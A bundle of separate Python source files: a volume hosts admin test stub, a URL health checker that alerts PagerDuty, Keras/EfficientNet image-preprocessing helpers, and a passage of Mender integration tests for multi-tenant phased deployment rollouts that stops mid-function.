class VolumeHostsAdminTestsJSON(base.BaseVolumeAdminTest):
@decorators.idempotent_id('d5f3efa2-6684-4190-9ced-1c2f526352ad')
def test_list_hosts(self):
hosts = self.admin_hosts_client.list_hosts()['hosts']
self.assertGreaterEqual(len(hosts), 2, "No. of hosts are < 2,"
"response of list hosts is: % s" % hosts)
|
the-stack_106_23270 | from collections import deque
import logging
import time
import socket
import hashlib
import requests
import pdpyras
import yaml
LOG = logging.getLogger(__name__)
hostname = socket.getfqdn()
class Check(object):
def __init__(self, url, pd_api_key, **kwargs):
self.url = url
self.pd_api_key = pd_api_key
self.previous_checks = deque(maxlen=10)
sha = hashlib.sha256()
sha.update(url.encode("ascii"))
self.dup_key = sha.hexdigest()
def run(self):
status = 0
resp_text = ""
exc_text = ""
try:
resp = requests.get(self.url)
resp_text = resp.text
resp.raise_for_status()
except Exception as ex:
status = 1
exc_text = str(ex)
LOG.info("Check results: status=%r body=%r exc=%r" % (status, resp_text, exc_text))
self.previous_checks.append(status)
self._report({"body": resp_text, "exception": exc_text})
def _report(self, data):
pd = pdpyras.EventsAPISession(self.pd_api_key)
if len(list(filter(lambda x: x != 0, list(self.previous_checks)[-2:]))) >= 2:
# last two are consecutive failures
LOG.info("Reporting as triggered")
pd.trigger(
"Service at %s is DOWN" % self.url,
source=hostname,
severity="critical",
custom_details=data,
dedup_key=self.dup_key
)
else:
LOG.info("Reporting as resolved")
pd.resolve(self.dup_key)
def main():
with open("./watchman.yaml") as watchfile:
watch_data = yaml.safe_load(watchfile)
checks = []
for check in watch_data.get("checks", []):
checks.append(Check(**check))
while True:
try:
for check in checks:
check.run()
except Exception as ex:
LOG.exception("error in main loop: %s" % ex)
time.sleep(60)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
main()
|
the-stack_106_23273 | # Copyright 2019 The TensorFlow Authors, Pavel Yakubovskiy. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import functools
import cv2
import numpy as np
_KERAS_BACKEND = None
_KERAS_LAYERS = None
_KERAS_MODELS = None
_KERAS_UTILS = None
def get_submodules_from_kwargs(kwargs):
backend = kwargs.get('backend', _KERAS_BACKEND)
layers = kwargs.get('layers', _KERAS_LAYERS)
models = kwargs.get('models', _KERAS_MODELS)
utils = kwargs.get('utils', _KERAS_UTILS)
for key in kwargs.keys():
if key not in ['backend', 'layers', 'models', 'utils']:
raise TypeError('Invalid keyword argument: %s', key)
return backend, layers, models, utils
def inject_keras_modules(func):
import keras
@functools.wraps(func)
def wrapper(*args, **kwargs):
kwargs['backend'] = keras.backend
kwargs['layers'] = keras.layers
kwargs['models'] = keras.models
kwargs['utils'] = keras.utils
return func(*args, **kwargs)
return wrapper
def inject_tfkeras_modules(func):
import tensorflow.keras as tfkeras
@functools.wraps(func)
def wrapper(*args, **kwargs):
kwargs['backend'] = tfkeras.backend
kwargs['layers'] = tfkeras.layers
kwargs['models'] = tfkeras.models
kwargs['utils'] = tfkeras.utils
return func(*args, **kwargs)
return wrapper
def init_keras_custom_objects():
import keras
import efficientnet as model
custom_objects = {
'swish': inject_keras_modules(model.get_swish)(),
'FixedDropout': inject_keras_modules(model.get_dropout)()
}
keras.utils.generic_utils.get_custom_objects().update(custom_objects)
def init_tfkeras_custom_objects():
import tensorflow.keras as tfkeras
import efficientnet as model
custom_objects = {
'swish': inject_tfkeras_modules(model.get_swish)(),
'FixedDropout': inject_tfkeras_modules(model.get_dropout)()
}
tfkeras.utils.get_custom_objects().update(custom_objects)
def normalize_image(image):
"""
Normalize image by subtracting and dividing by the pre-computed
mean and std. dev. Operates on image in-place
"""
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
image[..., 0] -= mean[0]
image[..., 1] -= mean[1]
image[..., 2] -= mean[2]
image[..., 0] /= std[0]
image[..., 1] /= std[1]
image[..., 2] /= std[2]
def resize_image(image, image_size):
"""Resize images to image_size."""
image_height, image_width = image.shape[:2]
# check if image needs to be resized
if image_height == image_width == image_size:
return image, 0, 0, 0
# scale the image dimensions to fit into the new size without distortion
if image_height > image_width:
scale = image_size / image_height
resized_height = image_size
resized_width = int(image_width * scale)
else:
scale = image_size / image_width
resized_height = int(image_height * scale)
resized_width = image_size
# Resize the input image to fit
image = cv2.resize(image, (resized_width, resized_height))
offset_h = (image_size - resized_height) // 2
offset_w = (image_size - resized_width) // 2
# Paste the input image into the center of a grey image of target size
new_image = 128 * np.ones((image_size, image_size, 3), dtype=image.dtype)
new_image[offset_h:offset_h + resized_height,
offset_w:offset_w + resized_width] = image
return new_image, scale, offset_h, offset_w
def preprocess_image(image, image_size):
resized_image, scale, offset_h, offset_w = resize_image(image, image_size)
return resized_image, scale, offset_h, offset_w
|
the-stack_106_23274 | # Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import multiprocessing as mp
import os
import random
import time
import uuid
from datetime import datetime, timedelta
import testutils.api.deviceauth as deviceauth
import testutils.api.useradm as useradm
import testutils.api.inventory as inventory
import testutils.api.inventory_v2 as inventory_v2
import testutils.api.deployments as deployments
import testutils.api.deployments_v2 as deployments_v2
from testutils.api.client import ApiClient
from testutils.common import (
create_org,
create_user,
clean_mongo,
mongo_cleanup,
mongo,
get_mender_artifact,
make_accepted_device,
make_accepted_devices,
)
from testutils.infra.container_manager.kubernetes_manager import isK8S
WAITING_MULTIPLIER = 8 if isK8S() else 1
def upload_image(filename, auth_token, description="abc"):
api_client = ApiClient(deployments.URL_MGMT)
api_client.headers = {}
r = api_client.with_auth(auth_token).call(
"POST",
deployments.URL_DEPLOYMENTS_ARTIFACTS,
files=(
("description", (None, description)),
("size", (None, str(os.path.getsize(filename)))),
("artifact", (filename, open(filename, "rb"), "application/octet-stream")),
),
)
assert r.status_code == 201
def create_tenant_test_setup(
user_name, tenant_name, nr_deployments=3, nr_devices=100, plan="os"
):
"""
Creates a tenant, and a user belonging to the tenant
with 'nr_deployments', and 'nr_devices'
"""
api_mgmt_deploy = ApiClient(deployments.URL_MGMT)
tenant = create_org(tenant_name, user_name, "correcthorse", plan=plan)
user = tenant.users[0]
r = ApiClient(useradm.URL_MGMT).call(
"POST", useradm.URL_LOGIN, auth=(user.name, user.pwd)
)
assert r.status_code == 200
user.utoken = r.text
tenant.users = [user]
upload_image("/tests/test-artifact.mender", user.utoken)
# Create three deployments for the user
for i in range(nr_deployments):
request_body = {
"name": str(i) + "st-dummy-deployment",
"artifact_name": "deployments-phase-testing",
"devices": ["uuid not needed" + str(i) for i in range(nr_devices)],
}
resp = api_mgmt_deploy.with_auth(user.utoken).call(
"POST", "/deployments", body=request_body
)
assert resp.status_code == 201
# Verify that the 'nr_deployments' expected deployments have been created
resp = api_mgmt_deploy.with_auth(user.utoken).call("GET", "/deployments")
assert resp.status_code == 200
assert len(resp.json()) == nr_deployments
return tenant
@pytest.fixture(scope="function")
def setup_deployments_enterprise_test(
clean_mongo, existing_deployments=3, nr_devices=100, plan="enterprise"
):
"""
Creates two tenants, with one user each, where each user has three deployments,
and a hundred devices each.
"""
uuidv4 = str(uuid.uuid4())
tenant1 = create_tenant_test_setup(
"some.user+" + uuidv4 + "@example.com", "test.mender.io-" + uuidv4, plan=plan
)
# Add a second tenant to make sure that the functionality does not interfere with other tenants
uuidv4 = str(uuid.uuid4())
tenant2 = create_tenant_test_setup(
"some.user+" + uuidv4 + "@example.com", "test.mender.io-" + uuidv4, plan=plan
)
# Create 'existing_deployments' predefined deployments to act as noise for the server to handle
# for both users
return tenant1, tenant2
class TestDeploymentsEndpointEnterprise(object):
#
# The test_cases array consists of test tuples of the form:
# (request, expected_response)
#
test_cases = [
# One phase:
# + start_time
# + batch_size
(
{
"name": "One phase, with start time, and full batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 100,
}
],
},
{
"name": "One phase, with start time, and full batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 100}],
},
),
# One phase:
# + start_time
# - batch_size
(
{
"name": "One phase, with start time",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z"
}
],
},
{
"name": "One phase, with start time",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
},
),
# One phase:
# - start_time
# + batch_size
(
{
"name": "One phase, with no start time, and full batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [{"batch_size": 100}],
},
{
"name": "One phase, with no start time, and full batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 100}],
},
),
# Two phases:
# first:
# + start_time
# + batch_size
# last:
# + start_time
# + batch_size
(
{
"name": "Two phases, with start time and batch, last with start time and batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 90,
},
],
},
{
"name": "Two phases, with start time and batch, last with start time and batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 10}, {"batch_size": 90}],
},
),
# Two phases:
# first:
# - start_time
# + batch_size
# last:
# + start_time
# + batch_size
(
{
"name": "Two phases, with no start time and batch, last with start time and batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{"batch_size": 10},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 90,
},
],
},
{
"name": "Two phases, with no start time and batch, last with start time and batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 10}, {"batch_size": 90}],
},
),
# Two phases:
# first:
# - start_time
# + batch_size
# last:
# + start_time
# - batch_size
(
{
"name": "Two phases, with no start time and batch, last with start time",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{"batch_size": 10},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z"
},
],
},
{
"name": "Two phases, with no start time and batch, last with start time",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [{"batch_size": 10}, {"batch_size": 90}],
},
),
# Three phases:
# first phase:
# + start_time
# + batch_size
# last phase:
# + start_time
# + batch_size
(
{
"name": "Three phases, first start and batch, last start and batch",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
"start_time": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=2)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
],
},
{
"name": "Three phases, first start and batch, last start and batch",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [
{
"batch_size": 10,
# The nr of devices that asked for an update within the phase, in this case 0
"device_count": 0,
},
{"batch_size": 45, "device_count": 0},
{"batch_size": 45, "device_count": 0},
],
},
),
# Three phases:
# first phase:
# - start_time
# + batch_size
# last phase:
# + start_time
# + batch_size
(
{
"name": "Three phases, first batch, last start and batch",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{"batch_size": 10},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=2)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
],
},
{
"name": "Three phases, first batch, last start and batch",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [
{"batch_size": 10, "device_count": 0},
{"batch_size": 45, "device_count": 0},
{"batch_size": 45, "device_count": 0},
],
},
),
# Three phases:
# first phase:
# - start_time
# + batch_size
# last phase:
# + start_time
# - batch_size
(
{
"name": "Three phases, first batch, last start",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{"batch_size": 10},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 45,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=2)).isoformat("T")
)
+ "Z",
# Batch size is optional in the last stage (ie, it is the remaining devices)
},
],
},
{
"name": "Three phases, first batch, last start",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [
{
"batch_size": 10,
# The nr of devices that asked for an update within the phase, in this case 0
"device_count": 0,
},
{"batch_size": 45, "device_count": 0},
{"batch_size": 45, "device_count": 0},
],
},
),
# Phase, Five batches, just make sure it works. Should behave like all other > 1 cases
(
{
"name": "Five phases, first no start time, last start time, no batch size",
"artifact_name": "deployments-phase-testing",
"devices": ["dummyuuid" + str(i) for i in range(100)],
"phases": [
{
# Start time is optional in the first stage (default to now)
"batch_size": 10
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=1)).isoformat("T")
)
+ "Z",
"batch_size": 10,
},
{
"start_ts": str(
(datetime.utcnow() + timedelta(days=2)).isoformat("T")
)
+ "Z",
# Batch size is optional in the last stage (ie, it is the remaining devices)
},
],
},
{
"name": "Five phases, first no start time, last start time, no batch size",
"artifact_name": "deployments-phase-testing",
"device_count": 0,
"max_devices": 100,
"phases": [
{"batch_size": 10, "device_count": 0},
{"batch_size": 10, "device_count": 0},
{"batch_size": 10, "device_count": 0},
{"batch_size": 10, "device_count": 0},
{"batch_size": 60, "device_count": 0},
],
},
),
]
@pytest.mark.parametrize("test_case", test_cases)
def test_phased_deployments_success(
self, test_case, setup_deployments_enterprise_test
):
deploymentclient = ApiClient(deployments.URL_MGMT)
tenant1, tenant2 = setup_deployments_enterprise_test
resp = deploymentclient.with_auth(tenant2.users[0].utoken).call(
"GET", "/deployments"
)
assert resp.status_code == 200
# Store the second tenants user deployments, to verify that
# it remains unchanged after the tests have run
backup_tenant_user_deployments = resp.json()
request_body, expected_response = test_case
resp = deploymentclient.with_auth(tenant1.users[0].utoken).call(
"POST", "/deployments", body=request_body
)
assert resp.status_code == 201
deployment_id = os.path.basename(resp.headers["Location"])
resp = deploymentclient.with_auth(tenant1.users[0].utoken).call(
"GET", "/deployments"
)
assert resp.status_code == 200
assert len(resp.json()) == 4
# Get the test deployment from the list
reg_response_body_dict = None
for deployment in resp.json():
if deployment["name"] == expected_response["name"]:
reg_response_body_dict = deployment
resp = deploymentclient.with_auth(tenant1.users[0].utoken).call(
"GET", "/deployments/" + deployment_id
)
assert resp.status_code == 200
id_response_body_dict = resp.json()
assert reg_response_body_dict == id_response_body_dict
TestDeploymentsEndpointEnterprise.compare_response_json(
expected_response, id_response_body_dict
)
# Verify that the second tenant's deployemnts remain untouched
resp = deploymentclient.with_auth(tenant2.users[0].utoken).call(
"GET", "/deployments"
)
assert resp.status_code == 200
assert backup_tenant_user_deployments == resp.json()
def compare_response_json(expected_response, response_body_json):
"""Compare the keys that are present in the expected json dict with the matching response keys.
Ignore those response keys which are not present in the expected dictionary"""
for key in expected_response.keys() & response_body_json.keys():
if key == "phases":
TestDeploymentsEndpointEnterprise.compare_phases_json(
expected_response["phases"], response_body_json["phases"]
)
else:
assert expected_response[key] == response_body_json[key]
def compare_phases_json(expected, response):
"""phases is a list of phases json objects. Compare them"""
assert len(expected) == len(response)
# The phases are a list of phase objects. Compare them on matching keys
for exp, rsp in zip(expected, response):
for k in exp.keys() & rsp.keys():
assert exp[k] == rsp[k]
def setup_devices_and_management_st(nr_devices=100, deploy_to_group=None):
"""
Sets up user creates authorized devices.
"""
user = create_user("[email protected]", "correcthorse")
useradmm = ApiClient(useradm.URL_MGMT)
devauthd = ApiClient(deviceauth.URL_DEVICES)
devauthm = ApiClient(deviceauth.URL_MGMT)
invm = ApiClient(inventory.URL_MGMT)
# log in user
r = useradmm.call("POST", useradm.URL_LOGIN, auth=(user.name, user.pwd))
assert r.status_code == 200
utoken = r.text
# Upload a dummy artifact to the server
upload_image("/tests/test-artifact.mender", utoken)
# prepare accepted devices
devs = make_accepted_devices(devauthd, devauthm, utoken, "", nr_devices)
# wait for devices to be provisioned
time.sleep(3)
if deploy_to_group:
for device in devs[:-1]:
r = invm.with_auth(utoken).call(
"PUT",
inventory.URL_DEVICE_GROUP.format(id=device.id),
body={"group": deploy_to_group},
)
assert r.status_code == 204
# Check that the number of devices were created
r = invm.with_auth(utoken).call(
"GET", inventory.URL_DEVICES, qs_params={"per_page": nr_devices}
)
assert r.status_code == 200
api_devs = r.json()
assert len(api_devs) == nr_devices
return user, utoken, devs
def setup_devices_and_management_mt(nr_devices=100, deploy_to_group=None):
"""
Sets up user and tenant and creates authorized devices.
"""
uuidv4 = str(uuid.uuid4())
tenant = create_org(
"test.mender.io-" + uuidv4,
"some.user+" + uuidv4 + "@example.com",
"correcthorse",
plan="enterprise",
)
user = tenant.users[0]
useradmm = ApiClient(useradm.URL_MGMT)
devauthd = ApiClient(deviceauth.URL_DEVICES)
devauthm = ApiClient(deviceauth.URL_MGMT)
invm = ApiClient(inventory.URL_MGMT)
# log in user
r = useradmm.call("POST", useradm.URL_LOGIN, auth=(user.name, user.pwd))
assert r.status_code == 200
utoken = r.text
# Upload a dummy artifact to the server
upload_image("/tests/test-artifact.mender", utoken)
# prepare accepted devices
devs = make_accepted_devices(
devauthd, devauthm, utoken, tenant.tenant_token, nr_devices
)
# wait for devices to be provisioned
time.sleep(3)
if deploy_to_group:
for device in devs[:-1]:
r = invm.with_auth(utoken).call(
"PUT",
inventory.URL_DEVICE_GROUP.format(id=device.id),
body={"group": deploy_to_group},
)
assert r.status_code == 204
# Check that the number of devices were created
r = invm.with_auth(utoken).call(
"GET", inventory.URL_DEVICES, qs_params={"per_page": nr_devices}
)
assert r.status_code == 200
api_devs = r.json()
assert len(api_devs) == nr_devices
return user, tenant, utoken, devs
def try_update(
device, default_artifact_name="bugs-bunny", default_device_type="qemux86-64"
):
"""
Try to make an update with a device
:param devices: list of devices
:param expected_status_code: expected status code
:param default_artifact_name: default artifact name of the
artifact used in the request
NOTE: You can override the device type and artifact name
by creating a device_type/artifact_name member of the
Device object.
"""
api_dev_deploy = ApiClient(deployments.URL_DEVICES)
# Try to retrieve next update and assert expected status code
resp = api_dev_deploy.with_auth(device.token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": getattr(device, "artifact_name", default_artifact_name),
"device_type": getattr(device, "device_type", default_device_type),
},
)
if resp.status_code == 200:
# Update device status upon successful request
api_dev_deploy.with_auth(device.token).call(
"PUT",
deployments.URL_STATUS.format(id=resp.json()["id"]),
body={"status": "success"},
)
return resp.status_code
class TestDeploymentsEnterprise(object):
def test_regular_deployment(self, clean_mongo):
user, tenant, utoken, devs = setup_devices_and_management_mt()
api_mgmt_dep = ApiClient(deployments.URL_MGMT)
# Make deployment request
deployment_req = {
"name": "phased-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
}
api_mgmt_dep.with_auth(utoken).call(
"POST", deployments.URL_DEPLOYMENTS, deployment_req
)
for dev in devs:
status_code = try_update(dev)
assert status_code == 200
dev.artifact_name = deployment_req["artifact_name"]
for dev in devs:
# Deployment already finished
status_code = try_update(dev)
assert status_code == 204
deployment_req["name"] = "really-old-update"
api_mgmt_dep.with_auth(utoken).call(
"POST", deployments.URL_DEPLOYMENTS, deployment_req
)
for dev in devs:
# Already installed
status_code = try_update(dev)
assert status_code == 204
class TestPhasedRolloutDeploymentsEnterprise:
def try_phased_updates(
self, deployment, devices, user_token, expected_update_status=200
):
# Static helper function
# Setup Deployment APIs
api_mgmt_deploy = ApiClient(deployments.URL_MGMT)
devices_updated = 0
num_phases = len(deployment["phases"])
batch_sizes = [
int((deployment["phases"][i]["batch_size"] / 100.0) * len(devices))
for i in range(num_phases - 1)
]
# Final batch_size might not be specified
batch_sizes.append(len(devices) - sum(batch_sizes))
# POST deployment
resp = api_mgmt_deploy.with_auth(user_token).call(
"POST", deployments.URL_DEPLOYMENTS, body=deployment
)
assert resp.status_code == 201
# Store the location from the GET /deployments/{id} request
deployment_id = os.path.basename(resp.headers["Location"])
for i in range(num_phases):
if i == 0 and "start_ts" not in deployment["phases"][i]:
# First phase don't need to specify `start_ts`
pass
elif "start_ts" in deployment["phases"][i]:
# Sleep until next phase starts
start_ts = datetime.strptime(
deployment["phases"][i]["start_ts"], "%Y-%m-%dT%H:%M:%SZ"
)
now = datetime.utcnow()
# While phase in progress
# NOTE: add a half a second buffer time, as a just-in-time
# request will break the remainder of the test
while now < (
start_ts - timedelta(milliseconds=500 * WAITING_MULTIPLIER)
):
# Spam update requests from random non-updated devices
dev = random.choice(devices)
status_code = try_update(dev)
assert status_code == 204 or status_code == 429
now = datetime.utcnow()
# Sleep the last 500ms to let the next phase start
time.sleep(0.5 * WAITING_MULTIPLIER)
else:
raise ValueError(
"Invalid phased deployment request, "
"missing `start_ts` for phase %d" % i
)
# Test for all devices in the deployment
if devices_updated > 0:
# Allready updated
for device in devices[:devices_updated]:
status_code = try_update(device)
assert status_code == 204
# Check phase count has not been incremented by the above requests
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS_ID.format(id=deployment_id)
)
phase = resp.json()["phases"][i]
assert phase["device_count"] == 0
# Devices that should update
for n, device in enumerate(
devices[devices_updated : (devices_updated + batch_sizes[i])], 1
):
status_code = try_update(device)
assert status_code == expected_update_status
if expected_update_status == 200:
# Make sure to override artifact_name property
device.artifact_name = deployment["artifact_name"]
# Check phase count is incremented correctly
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", os.path.join("/deployments", deployment_id)
)
phase = resp.json()["phases"][i]
assert phase["device_count"] == n
if i < num_phases - 1:
# Capacity exceeded
for device in devices[(devices_updated + batch_sizes[i]) :]:
status_code = try_update(device)
assert status_code == 204
devices_updated += batch_sizes[i]
# Check phase count equals batch size
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", os.path.join("/deployments", deployment_id)
)
phases = resp.json()["phases"]
for p in range(i + 1):
assert phases[p]["device_count"] == batch_sizes[p]
for p in range(i + 1, len(phases)):
assert phases[p]["device_count"] == 0
# Finally confirm that deployment is finished
assert resp.json()["status"] == "finished"
def test_phased_regular_deployment(self, clean_mongo):
"""
Phased equivalent of a regular deployment.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt()
deployment_req = {
"name": "phased-regular-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [{}],
}
self.try_phased_updates(deployment_req, devs, utoken)
def test_delayed_deployment(self, clean_mongo):
"""
Uses a single phase with a delayed start-time.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt()
deployment_req = {
"name": "phased-delayed-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ")
}
],
}
self.try_phased_updates(deployment_req, devs, utoken)
def test_two_phases_full_spec(self, clean_mongo):
"""
Two phases, with batch_size and start_ts specified for both phases.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt()
deployment_req = {
"name": "two-fully-spec-deployments",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{
"batch_size": 10,
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
},
{
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=2 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
"batch_size": 90,
},
],
}
self.try_phased_updates(deployment_req, devs, utoken)
def test_three_phased_deployments(self, clean_mongo):
"""
Three phases; with no start_ts in first and no batch_size in third.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt(nr_devices=101)
deployment_req = {
"name": "three-phased-deployments",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{"batch_size": 13},
{
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
"batch_size": 17,
},
{
"batch_size": 29,
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=2 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
},
{
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=3 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ")
},
],
}
self.try_phased_updates(deployment_req, devs, utoken)
def test_disallow_empty_phase(self, clean_mongo):
"""
Test that in the case a batch is empty due to rounding errors,
the server returns 400, with an appropriate error message.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt(nr_devices=101)
deployment_req = {
"name": "empty-batch-test",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs[:11]],
"phases": [
{"batch_size": 10},
{
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
"batch_size": 20,
},
{
"batch_size": 5,
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=2 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
},
{
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=3 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ")
},
],
}
resp = (
ApiClient(deployments.URL_MGMT)
.with_auth(utoken)
.call("POST", deployments.URL_DEPLOYMENTS, body=deployment_req)
)
assert resp.status_code == 400
assert "Attempt to create a batch with zero devices not allowed" in resp.text
assert "Batch: (3) will be empty" in resp.text
def test_no_artifact_for_devices(self, clean_mongo):
"""
Tests that phase counts and statistics are updated correctly
when there are no applicable artifact for the devices.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt(nr_devices=101)
for dev in devs:
dev.device_type = "pranked_exclamation-mark"
deployment_req = {
"name": "three-phased-deployments",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{"batch_size": 13},
{
"batch_size": 29,
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
},
{
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=2 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ")
},
],
}
self.try_phased_updates(
deployment_req, devs, utoken, expected_update_status=204
)
def calculate_phase_sizes(deployment_request):
batch_sizes = []
devices_in_phases = 0
device_count = len(deployment_request["devices"])
last_phase_idx = len(deployment_request["phases"]) - 1
for i, phase in enumerate(deployment_request["phases"]):
if i != last_phase_idx:
batch_sizes.append(int((phase["batch_size"] / 100.0) * device_count))
else:
batch_sizes.append(device_count - devices_in_phases)
devices_in_phases += batch_sizes[i]
return batch_sizes
class TestPhasedRolloutConcurrencyEnterprise:
def try_concurrent_phased_updates(
self, deployment, devices, user_token, expected_update_status=200
):
# Static helper function
# Setup Deployment APIs
api_mgmt_deploy = ApiClient(deployments.URL_MGMT)
status_codes = []
num_phases = len(deployment["phases"])
batch_sizes = [
int((deployment["phases"][i]["batch_size"] / 100.0) * len(devices))
for i in range(num_phases - 1)
]
# Final batch_size might not be specified
batch_sizes.append(len(devices) - sum(batch_sizes))
# POST deployment
resp = api_mgmt_deploy.with_auth(user_token).call(
"POST", deployments.URL_DEPLOYMENTS, body=deployment
)
assert resp.status_code == 201
# Store the location from the GET /deployments/{id} request
deployment_id = os.path.basename(resp.headers["Location"])
for i in range(num_phases):
if i == 0 and "start_ts" not in deployment["phases"][i]:
# First phase don't need to specify `start_ts`
pass
elif "start_ts" in deployment["phases"][i]:
# Sleep until next phase starts
start_ts = datetime.strptime(
deployment["phases"][i]["start_ts"], "%Y-%m-%dT%H:%M:%SZ"
)
now = datetime.utcnow()
# While phase in progress:
# Spam update requests from random batches of devices
# concurrently by creating a pool of minimum 4 processes
# that send requests in parallel.
with mp.Pool(max(4, mp.cpu_count())) as pool:
